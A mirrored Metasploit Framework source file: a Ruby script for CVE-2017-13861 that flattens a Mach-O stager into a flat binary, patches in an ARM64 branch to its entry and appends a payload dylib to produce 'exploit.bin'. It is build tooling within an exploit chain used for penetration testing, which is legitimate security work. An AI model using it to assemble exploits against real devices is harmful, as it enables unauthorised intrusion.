CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/external/source/exploits/CVE-2017-13861/create_bin.rb
Views: 11780
1
#!/usr/bin/env ruby

2
# -*- coding: binary -*-

3


4
require 'macho'

5


6
stager_file = ARGV[0]

7
data = File.binread(stager_file)

8
macho = MachO::MachOFile.new_from_bin(data)

9
main_func = macho[:LC_MAIN].first

10
entry_offset = main_func.entryoff

11


12
start = -1

13
min = -1

14
max = 0

15
for segment in macho.segments

16
  next if segment.segname == MachO::LoadCommands::SEGMENT_NAMES[:SEG_PAGEZERO]

17
  puts "segment: #{segment.segname} #{segment.vmaddr.to_s(16)}"

18
  if min == -1 or min > segment.vmaddr

19
    min = segment.vmaddr

20
  end

21
  if max < segment.vmaddr + segment.vmsize

22
    max = segment.vmaddr + segment.vmsize

23
  end

24
end

25


26
puts "data: #{min.to_s(16)} -> #{max.to_s(16)} #{(max - min).to_s(16)}"

27
output_data = "\x00" * (max - min)

28


29
for segment in macho.segments

30
  #next if segment.segname == MachO::LoadCommands::SEGMENT_NAMES[:SEG_PAGEZERO]

31
  puts "segment: #{segment.segname} off: #{segment.offset.to_s(16)} vmaddr: #{segment.vmaddr.to_s(16)} fileoff: #{segment.fileoff.to_s(16)}"

32
  for section in segment.sections

33
    puts "section: #{section.sectname} off: #{section.offset.to_s(16)} addr: #{section.addr.to_s(16)} size: #{section.size.to_s(16)}"

34
    flat_addr = section.addr - min

35
    section_data = data[section.offset, section.size]

36
    #file_section = section.offset

37
    #puts "info: #{segment.fileoff.to_s(16)} #{segment.offset.to_s(16)} #{section.size.to_s(16)} #{file_section.to_s(16)}"

38
    #puts "?: #{data.size.to_s(16)} #{file_section.to_s(16)}"

39
    if section_data

40
      puts "flat_addr: #{flat_addr.to_s(16)} (#{section_data.size.to_s(16)})"

41
      if start == -1 or start > flat_addr

42
        start = flat_addr

43
      end

44
      output_data[flat_addr, section_data.size] = section_data

45
    end

46
  end

47
end

48


49
puts "start: #{start.to_s(16)}"

50
branch = `rasm2 -b 64 -a arm "b 0x#{start.to_s(16)}"`

51
puts "branch: #{branch}"

52
output_data[0,4] = [ branch[0..7] ].pack("H*")

53


54
puts "size: #{output_data.length}"

55
add_dylib = 0x10000

56
padding = "\x00" * (add_dylib - output_data.length)

57
output_data = output_data + padding

58


59
payload = File.binread("payload.dylib")

60
output_data[add_dylib, payload.size] = payload

61


62
puts "final size: #{output_data.length}"

63
File.binwrite("exploit.bin", output_data)

64


65


66